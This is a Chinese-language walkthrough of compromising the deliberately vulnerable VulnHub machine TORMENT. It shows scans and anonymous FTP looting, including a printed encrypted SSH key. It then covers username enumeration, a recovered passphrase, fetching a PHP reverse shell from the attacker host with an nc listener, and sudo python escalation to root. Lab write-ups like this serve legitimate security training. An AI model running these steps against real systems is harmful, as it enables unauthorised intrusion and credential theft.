靶机描述
靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-torment,299/
一、搭建靶机环境
攻击机Kali:
靶机:
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫)
arp-scan -I eth0 -l
⬢ TORMENT arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2 08:00:27:ab:1a:1b PCS Systemtechnik GmbH
192.168.9.53 08:00:27:1f:47:d2 PCS Systemtechnik GmbH
2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.950 seconds (131.28 hosts/sec). 2 responded
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.184.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth0 -r 192.168.184.0/24
方法四、等你们补充
2.1.2 查看靶机开放的端口
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
⬢ TORMENT nmap -A -sV -T4 -p- 192.168.9.53
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-24 14:30 CST
Nmap scan report for bogon (192.168.9.53)
Host is up (0.00034s latency).
Not shown: 65516 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.9.7
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 112640 Dec 28 2018 alternatives.tar.0
| -rw-r--r-- 1 ftp ftp 4984 Dec 23 2018 alternatives.tar.1.gz
| -rw-r--r-- 1 ftp ftp 95760 Dec 28 2018 apt.extended_states.0
| -rw-r--r-- 1 ftp ftp 10513 Dec 27 2018 apt.extended_states.1.gz
| -rw-r--r-- 1 ftp ftp 10437 Dec 26 2018 apt.extended_states.2.gz
| -rw-r--r-- 1 ftp ftp 559 Dec 23 2018 dpkg.diversions.0
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.1.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.2.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.3.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.4.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.5.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.6.gz
| -rw-r--r-- 1 ftp ftp 505 Dec 28 2018 dpkg.statoverride.0
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.1.gz
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.2.gz
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.3.gz
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.4.gz
| -rw-r--r-- 1 ftp ftp 281 Dec 27 2018 dpkg.statoverride.5.gz
| -rw-r--r-- 1 ftp ftp 208 Dec 23 2018 dpkg.statoverride.6.gz
| -rw-r--r-- 1 ftp ftp 1719127 Jan 01 2019 dpkg.status.0
|_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
| 2048 84:c7:31:7a:21:7d:10:d3:a9:9c:73:c2:c2:2d:d6:77 (RSA)
| 256 a5:12:e7:7f:f0:17:ce:f1:6a:a5:bc:1f:69:ac:14:04 (ECDSA)
|_ 256 66:c7:d0:be:8d:9d:9f:bf:78:67:d2:bc:cc:7d:33:b9 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: TORMENT.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=TORMENT
| Subject Alternative Name: DNS:TORMENT
| Not valid before: 2018-12-23T14:28:47
|_Not valid after: 2028-12-20T14:28:47
80/tcp open http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25
|_http-title: Apache2 Debian Default Page: It works
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 41233/tcp6 mountd
| 100005 1,2,3 46203/tcp mountd
| 100005 1,2,3 49339/udp mountd
| 100005 1,2,3 49394/udp6 mountd
| 100021 1,3,4 34459/tcp6 nlockmgr
| 100021 1,3,4 36137/tcp nlockmgr
| 100021 1,3,4 53291/udp nlockmgr
| 100021 1,3,4 58511/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 have LITERAL+ ENABLE more ID post-login AUTH=PLAIN listed capabilities OK Pre-login IDLE AUTH=LOGINA0001 SASL-IR LOGIN-REFERRALS
445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
631/tcp open ipp CUPS 2.2
|_http-title: Bad Request - CUPS v2.2.1
|_http-server-header: CUPS/2.2 IPP/2.1
2049/tcp open nfs_acl 3 (RPC #100227)
6667/tcp open irc ngircd
6668/tcp open irc ngircd
6669/tcp open irc ngircd
6672/tcp open irc ngircd
6674/tcp open irc ngircd
36137/tcp open nlockmgr 1-4 (RPC #100021)
41735/tcp open mountd 1-3 (RPC #100005)
46203/tcp open mountd 1-3 (RPC #100005)
49167/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:1F:47:D2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: TORMENT.localdomain, TORMENT, irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 5h19m57s, deviation: 4h37m07s, median: 7h59m57s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.12-Debian)
| Computer name: torment
| NetBIOS computer name: TORMENT\x00
| Domain name: \x00
| FQDN: torment
|_ System time: 2022-03-24T22:30:41+08:00
|_nbstat: NetBIOS name: TORMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2022-03-24T14:30:42
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.34 ms bogon (192.168.9.53)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.82 seconds
⬢ TORMENT
21—ftp—vsftpd 2.0.8 or later—Anonymous FTP login allowed (FTP code 230)
22—ssh—OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
25—smtp—Postfix smtpd
80—http—Apache httpd 2.4.25
111—rpcbind—2-4 (RPC #100000)
139—netbios-ssn—Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143—imap—Dovecot imapd
445—netbios-ssn—Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
631—ipp—CUPS 2.2
2049—nfs_acl—3 (RPC #100227)
6667—irc—ngircd
6668—irc—ngircd
6669—irc—ngircd
6672—irc—ngircd
6674—irc—ngircd
36137—nlockmgr—1-4 (RPC #100021)
41735—mountd—1-3 (RPC #100005)
46203—mountd—1-3 (RPC #100005)
49167—mountd—1-3 (RPC #100005)
2.2枚举漏洞
2.2.1 21端口分析
anonymous 无密码匿名登录
⬢ TORMENT ftp 192.168.9.53
Connected to 192.168.9.53.
220 vsftpd (broken)
Name (192.168.9.53:hirak0): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
进行信息收集
ftp> ls -al
229 Entering Extended Passive Mode (|||44686|)
150 Here comes the directory listing.
drwxr-xr-x 11 ftp ftp 4096 Mar 24 22:27 .
drwxr-xr-x 11 ftp ftp 4096 Mar 24 22:27 ..
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .cups
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .ftp
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .imap
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .mysql
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .nfs
drwxr-xr-x 2 ftp ftp 4096 Jan 04 2019 .ngircd
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .samba
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .smtp
drwxr-xr-x 2 ftp ftp 4096 Jan 04 2019 .ssh
-rw-r--r-- 1 ftp ftp 112640 Dec 28 2018 alternatives.tar.0
-rw-r--r-- 1 ftp ftp 4984 Dec 23 2018 alternatives.tar.1.gz
-rw-r--r-- 1 ftp ftp 95760 Dec 28 2018 apt.extended_states.0
-rw-r--r-- 1 ftp ftp 10513 Dec 27 2018 apt.extended_states.1.gz
-rw-r--r-- 1 ftp ftp 10437 Dec 26 2018 apt.extended_states.2.gz
-rw-r--r-- 1 ftp ftp 559 Dec 23 2018 dpkg.diversions.0
-rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.1.gz
-rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.2.gz
-rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.3.gz
-rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.4.gz
-rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.5.gz
-rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.6.gz
-rw-r--r-- 1 ftp ftp 505 Dec 28 2018 dpkg.statoverride.0
-rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.1.gz
-rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.2.gz
-rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.3.gz
-rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.4.gz
-rw-r--r-- 1 ftp ftp 281 Dec 27 2018 dpkg.statoverride.5.gz
-rw-r--r-- 1 ftp ftp 208 Dec 23 2018 dpkg.statoverride.6.gz
-rw-r--r-- 1 ftp ftp 1719127 Jan 01 2019 dpkg.status.0
-rw-r--r-- 1 ftp ftp 493252 Jan 01 2019 dpkg.status.1.gz
-rw-r--r-- 1 ftp ftp 493252 Jan 01 2019 dpkg.status.2.gz
-rw-r--r-- 1 ftp ftp 492279 Dec 28 2018 dpkg.status.3.gz
-rw-r--r-- 1 ftp ftp 492279 Dec 28 2018 dpkg.status.4.gz
-rw-r--r-- 1 ftp ftp 489389 Dec 28 2018 dpkg.status.5.gz
-rw-r--r-- 1 ftp ftp 470278 Dec 27 2018 dpkg.status.6.gz
-rw------- 1 ftp ftp 1010 Dec 31 2018 group.bak
-rw------- 1 ftp ftp 840 Dec 31 2018 gshadow.bak
-rw------- 1 ftp ftp 2485 Dec 31 2018 passwd.bak
-rw------- 1 ftp ftp 1575 Dec 31 2018 shadow.bak
226 Directory send OK.
ftp>
好多东西,直接下载下来进行信息收集:wget -r ftp://192.168.9.53:21
查看channels其内容
⬢ TORMENT ls -al
总用量 24
drwxr-xr-x 3 hirak0 kali 4096 3月 24 14:55 .
drwxr-xr-x 6 hirak0 kali 4096 3月 24 14:27 ..
drwxr-xr-x 11 root root 4096 3月 24 14:55 192.168.9.53
-rw-r--r-- 1 root root 33 1月 5 2019 channels
-rw-r--r-- 1 root root 1766 1月 5 2019 id_rsa
-rw-r--r-- 1 root root 1471 3月 24 14:43 torment.txt
⬢ TORMENT cd 192.168.9.53
⬢ 192.168.9.53 ls -al
总用量 4896
drwxr-xr-x 11 root root 4096 3月 24 14:55 .
drwxr-xr-x 3 hirak0 kali 4096 3月 24 14:55 ..
-rw-r--r-- 1 root root 112640 12月 28 2018 alternatives.tar.0
-rw-r--r-- 1 root root 4984 12月 23 2018 alternatives.tar.1.gz
-rw-r--r-- 1 root root 95760 12月 28 2018 apt.extended_states.0
-rw-r--r-- 1 root root 10513 12月 27 2018 apt.extended_states.1.gz
-rw-r--r-- 1 root root 10437 12月 26 2018 apt.extended_states.2.gz
drwxr-xr-x 2 root root 4096 3月 24 14:55 .cups
-rw-r--r-- 1 root root 559 12月 23 2018 dpkg.diversions.0
-rw-r--r-- 1 root root 229 12月 23 2018 dpkg.diversions.1.gz
-rw-r--r-- 1 root root 229 12月 23 2018 dpkg.diversions.2.gz
-rw-r--r-- 1 root root 229 12月 23 2018 dpkg.diversions.3.gz
-rw-r--r-- 1 root root 229 12月 23 2018 dpkg.diversions.4.gz
-rw-r--r-- 1 root root 229 12月 23 2018 dpkg.diversions.5.gz
-rw-r--r-- 1 root root 229 12月 23 2018 dpkg.diversions.6.gz
-rw-r--r-- 1 root root 505 12月 28 2018 dpkg.statoverride.0
-rw-r--r-- 1 root root 295 12月 28 2018 dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 295 12月 28 2018 dpkg.statoverride.2.gz
-rw-r--r-- 1 root root 295 12月 28 2018 dpkg.statoverride.3.gz
-rw-r--r-- 1 root root 295 12月 28 2018 dpkg.statoverride.4.gz
-rw-r--r-- 1 root root 281 12月 27 2018 dpkg.statoverride.5.gz
-rw-r--r-- 1 root root 208 12月 23 2018 dpkg.statoverride.6.gz
-rw-r--r-- 1 root root 1719127 1月 1 2019 dpkg.status.0
-rw-r--r-- 1 root root 493252 1月 1 2019 dpkg.status.1.gz
-rw-r--r-- 1 root root 493252 1月 1 2019 dpkg.status.2.gz
-rw-r--r-- 1 root root 492279 12月 28 2018 dpkg.status.3.gz
-rw-r--r-- 1 root root 492279 12月 28 2018 dpkg.status.4.gz
-rw-r--r-- 1 root root 489389 12月 28 2018 dpkg.status.5.gz
-rw-r--r-- 1 root root 470278 12月 27 2018 dpkg.status.6.gz
drwxr-xr-x 2 root root 4096 3月 24 14:55 .ftp
drwxr-xr-x 2 root root 4096 3月 24 14:55 .imap
drwxr-xr-x 2 root root 4096 3月 24 14:55 .mysql
drwxr-xr-x 2 root root 4096 3月 24 14:55 .nfs
drwxr-xr-x 2 root root 4096 3月 24 14:55 .ngircd
drwxr-xr-x 2 root root 4096 3月 24 14:55 .samba
drwxr-xr-x 2 root root 4096 3月 24 14:55 .smtp
drwxr-xr-x 2 root root 4096 3月 24 14:55 .ssh
⬢ 192.168.9.53 cd .ngircd
⬢ .ngircd ls -al
总用量 12
drwxr-xr-x 2 root root 4096 3月 24 14:55 .
drwxr-xr-x 11 root root 4096 3月 24 14:55 ..
-rw-r--r-- 1 root root 33 1月 4 2019 channels
⬢ .ngircd cat channels
channels:
games
tormentedprinter
找到id_rsa,查看其内容
⬢ .ssh ls -al
总用量 12
drwxr-xr-x 2 root root 4096 3月 24 14:55 .
drwxr-xr-x 11 root root 4096 3月 24 14:55 ..
-rw-r--r-- 1 root root 1766 1月 4 2019 id_rsa
⬢ .ssh cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,C37F0C31D1560056EA1F9204EC405986
U9X/cW7GIiI48TQAzUs5ozEQgexHKiFi2NcoADhs/ax/CTJvZh32k+izzW0mMzl1
mo5HID0qNghIbVbRcN6Zv8cdJ/AhREjy25YZ68zA7GWoyfoch1K/XY0NEnNTchLf
b6k5GEgu5jfQT+pAj1A6jQyzz4A4CGbvD+iEEJRX3qsTlAn6th6dniRORJggnVLB
K4ONTeP4US7GSGTtOD+hwoyoR4zNQKT2Hn/WryoF7LdAXMwf1aNJJJ7YPz1YdSnU
fxXscbOMlXuZ4ouawIVGeYeH85lmOh7aBy5MWsYq/vNC+2pVzVEkRfc6jug1UbdG
hncWxfU92Q47lVuqtc4HPINynD2Q8rBlYrKsEbPqtLyCnBGM/T0Srzztj+IjXUD1
SdbVLmxascquwnIyv2w55vjwJv5dKjLBmrDiY0Doc9YYCGi6cz1p9tsE+G+uRg0r
hGuFXldsYEkoQcJ4iWjsYiqcwWWFfkN+A0rYXqqcDY+aqAy+jXkhyzfmUp3KBz9j
CjR1+7KcmKvNXtjn8V+iv2Nwf+qc2YzBNkBWlwHhxIz6L8F3k3OkqnZUqPKCW2Ga
CNMcIYx3+Gde3aXpHXg4OFALV7y23N8A2h97VOqnnrnED46C39shkA8iiMNdH9mz
87TWgw+wPLbWXJO7G5nJL0qciLV/Eo6atSof3FUx/4WX4fmYeg1Rdy0KgTC1NRGn
VT/YnlBrNW3f7fdhk/YhHbcT9vCg9/Nm3hmzQX/FBP085SgeEA+ebNMzQwPmqcfb
jGpMPdhD7iLmKPwQL3RFTVODjUyzsgJ6kz83aQd80qPClopqp4NFMLwATVpbN858
d4Q0QQGrCRqu2SYaYmVhGo37BJXKE11y0JzWXOhiVLD0I9fBoHDmsKHN4Aw3lbVE
/n+B0Qa1bIMGfXP7J4r7/+4trQCGi7ngVfhtygtg6j/HcoXDy9y15zrHZqKerWd6
6ApM1caan4T0FjqlqTOQsN5GmB9sBCu02VQ1QF3Z4FVA9oW+pkNFxAeKIddG1yLM
5L1ePDgEYjik6vM1lE/65c7fNaO8dndMau4reUnPbTFqKsTA46uUaMyOV6S7nsys
kHGcAXLEzvbC8ojK1Pg5Llok6f8YN+H7cP6vE1yCfx3oU3GdWV36AgBWLON8+Wwc
icoyqfW6E2I0xz5nlHoea/7szCNBI4wZmRI+GRcRgegQvG06QvdXNzjqdezbb4ba
EXRnMddmfjFSihlUhsKxLhCmbaJk5mG2oGLHQcOurvOUPh/qgRBfUf3PTntuUoa0
0+tGGaLYibDNb5eXQ39Bsjzm8BWG/dSK/Qq7UU4Bk2bTKikWQLazPAy482BsZpWI
mXt8ISmJqldgdrtnVvG3zoQBQpspZ6HTojheNazfD4zzvduQguOcKrCNICxoSRgA
egRER+uxaLqNGz+6H+9sl7FYWalMa+VzjrEDU7PeZNgOj9PxLdKbstQLQxC/Zq6+
7kYu2pHwqP2HcXmdJ9xYnptwkuqh5WGR82Zk+JkKwUBEQJmbVxjqWLjCV/CDA06z
6VvrfrPo3xt/CoZkH66qcm9LCTcM3DsLs3UT4B7aH5wk4l5MmpVI4/mx2Dlv0Mkv
-----END RSA PRIVATE KEY-----
⬢ .ssh
可惜不知道是哪个用户的
2.2.2 22 端口分析
一般只能暴力破解,暂时没有合适的字典
2.2.3 25端口分析
⬢ TORMENT enum4linux 192.168.9.53 | tee torment.txt
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 24 15:03:13 2022
==========================
| Target Information |
==========================
Target ........... 192.168.9.53
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 192.168.9.53 |
====================================================
[+] Got domain/workgroup name: WORKGROUP
============================================
| Nbtstat Information for 192.168.9.53 |
============================================
Looking up status of 192.168.9.53
TORMENT <00> - B <ACTIVE> Workstation Service
TORMENT <03> - B <ACTIVE> Messenger Service
TORMENT <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=====================================
| Session Check on 192.168.9.53 |
=====================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
⬢ TORMENT
2.2.4 80 端口分析
访问:http://192.168.9.53/
扫描一下目录:gobuster dir -u http://192.168.9.53 -x php,html -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
⬢ TORMENT gobuster dir -u http://192.168.9.53 -x php,html -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.53
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,php
[+] Add Slash: true
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2022/03/24 15:09:07 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
/icons/ (Status: 403) [Size: 284]
/manual/ (Status: 200) [Size: 626]
/server-status/ (Status: 403) [Size: 292]
===============================================================
2022/03/24 15:11:00 Finished
===============================================================
⬢ TORMENT
访问:http://192.168.9.53/manual/
2.2.5 631端口分析
网络服务器没有提供太多信息。 nmap 发现的另一个面向公众的服务是 CUPS(通用 UNIX 打印系统)
631/tcp open ipp CUPS 2.2
|_http-title: Bad Request - CUPS v2.2.1
|_http-server-header: CUPS/2.2 IPP/2.1
访问:http://192.168.9.53:631/
当我的浏览器指向该服务并查看Printers选项卡时,我得到了一个用户名列表。
创建一个usernames文件
⬢ TORMENT curl -s http://192.168.9.53:631/printers/ | grep Personal | cut -d/ -f3 | cut -d'&' -f1 > usernames
⬢ TORMENT ls -al
总用量 28
drwxr-xr-x 3 hirak0 kali 4096 3月 24 15:16 .
drwxr-xr-x 6 hirak0 kali 4096 3月 24 14:27 ..
drwxr-xr-x 11 root root 4096 3月 24 14:55 192.168.9.53
-rw-r--r-- 1 root root 33 1月 5 2019 channels
-rw-r--r-- 1 root root 1766 1月 5 2019 id_rsa
-rw-r--r-- 1 root root 1471 3月 24 15:03 torment.txt
-rw-r--r-- 1 root root 104 3月 24 15:16 usernames
⬢ TORMENT
咱们使用msf进行枚举smtp用户
⬢ TORMENT msfconsole -q
msf6 > use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > set rhosts 192.168.9.53
rhosts => 192.168.9.53
msf6 auxiliary(scanner/smtp/smtp_enum) > set user_file /home/kali/vulnhub/digitalworld.local/TORMENT/usernames.txt
user_file => /home/kali/vulnhub/digitalworld.local/TORMENT/usernames.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > exploit
[*] 192.168.9.53:25 - 192.168.9.53:25 Banner: 220 TORMENT.localdomain ESMTP Postfix (Debian/GNU)
[+] 192.168.9.53:25 - 192.168.9.53:25 Users found: Patrick, Qiu
[*] 192.168.9.53:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smtp/smtp_enum) >
成功拿到Patrick, Qiu
尝试ssh登录一下
⬢ TORMENT ssh -i id_rsa patrick@192.168.9.53
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
patrick@192.168.9.53: Permission denied (publickey).
⬢ TORMENT chmod 600 id_rsa
⬢ TORMENT ssh -i id_rsa patrick@192.168.9.53
Enter passphrase for key 'id_rsa':
patrick@192.168.9.53: Permission denied (publickey).
⬢ TORMENT ssh -i id_rsa qiu@192.168.9.53
Enter passphrase for key 'id_rsa':
qiu@192.168.9.53: Permission denied (publickey).
⬢ TORMENT
发现需要密码
这个时候想起来,前边ftp里边发现一个.ngircd文件夹
经搜索ngircd是个免费,便携式且轻便的Internet中继聊天服务器
于是我在网上搜索了ngircd配置文件,得到了一个默认密码:wealllikedebian
用户名也在ftp那个文件里有games和tormentedprinter
2.2.6 6667,6668,6669,6672,6674端口分析
我们知道这是通过 Google 进行的 hexchat 聊天。先安装客户端
sudo apt-get install hexchat
打开程序进行相关配置
添加网络--->torment
编辑一下该网络,使用6667,6668,6669,6672,6674端口,密码用wealllikedebian
配置完之后进行连接
成功进入聊天频道,并发现password为:mostmachineshaveasupersecurekeyandalongpassphrase
重新ssh登录一下
⬢ TORMENT ssh -i id_rsa patrick@192.168.9.53
Enter passphrase for key 'id_rsa':
Linux TORMENT 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jan 4 19:34:43 2019 from 192.168.254.139
patrick@TORMENT:~$
2.3漏洞利用
。。。
2.4权限提升
2.4.1 信息收集
patrick@TORMENT:~$ id
uid=1001(patrick) gid=1001(patrick) groups=1001(patrick)
patrick@TORMENT:~$ sudo -l
Matching Defaults entries for patrick on TORMENT:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User patrick may run the following commands on TORMENT:
(ALL) NOPASSWD: /bin/systemctl poweroff, /bin/systemctl halt, /bin/systemctl reboot
patrick@TORMENT:~$ cat /etc/passwd | grep -e '100.*'
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
qiu:x:1000:1000:qiu,,,:/home/qiu:/bin/bash
patrick:x:1001:1001:,,,:/home/patrick:/bin/bash
patrick@TORMENT:~$ find / -iname "*.conf" -type f -perm -o+w -exec ls -ld {} \; 2>/dev/null
-rwxrwxrwx 1 root root 7224 Nov 4 2018 /etc/apache2/apache2.conf
patrick@TORMENT:~$
更改一下/etc/apache2/apache2.conf文件内容
上传一个webshell进行反弹shell
patrick@TORMENT:/tmp$ ls -ld /var/www/html
drwxrwxrwx 2 www-data www-data 4096 Mar 25 00:35 /var/www/html
patrick@TORMENT:/tmp$ cd /var/www/html
patrick@TORMENT:/var/www/html$ wget http://192.168.9.7/php-reverse-shell.php
--2022-03-25 00:40:59-- http://192.168.9.7/php-reverse-shell.php
Connecting to 192.168.9.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2699 (2.6K) [application/octet-stream]
Saving to: ‘php-reverse-shell.php’
php-reverse-shell.php 100%[=======================================================>] 2.64K --.-KB/s in 0s
2022-03-25 00:40:59 (684 MB/s) - ‘php-reverse-shell.php’ saved [2699/2699]
patrick@TORMENT:/var/www/html$
kali进行监听:nc -lvp 6666
访问:http://192.168.9.53/php-reverse-shell.php
⬢ TORMENT nc -lvp 6666
listening on [any] 6666 ...
Warning: forward host lookup failed for bogon: Host name lookup failure : Resource temporarily unavailable
connect to [192.168.9.7] from bogon [192.168.9.53] 34510
Linux TORMENT 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
01:04:19 up 0 min, 0 users, load average: 2.53, 0.66, 0.22
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(qiu) gid=33(www-data) groups=33(www-data),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner)
sh: 0: can't access tty; job control turned off
$ id
uid=1000(qiu) gid=33(www-data) groups=33(www-data),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner)
$ python -c 'import pty;pty.spawn("/bin/bash")'
qiu@TORMENT:/$
然后进行信息收集
qiu@TORMENT:/$ sudo -l
sudo -l
Matching Defaults entries for qiu on TORMENT:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User qiu may run the following commands on TORMENT:
(ALL) NOPASSWD: /usr/bin/python, /bin/systemctl
发现python可以进行sudo提权
qiu@TORMENT:/$ sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
root@TORMENT:/# cd /root
cd /root
root@TORMENT:~# ls -al
ls -al
total 44
drwx------ 6 root root 4096 Jan 4 2019 .
drwxr-xr-x 23 root root 4096 Jan 4 2019 ..
-rw------- 1 root root 56 Jan 4 2019 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 2 root root 4096 Dec 23 2018 .cache
drwx------ 5 root root 4096 Dec 31 2018 .config
drwxr-xr-x 3 root root 4096 Dec 31 2018 .local
drwxr-xr-x 2 root root 4096 Dec 24 2018 .nano
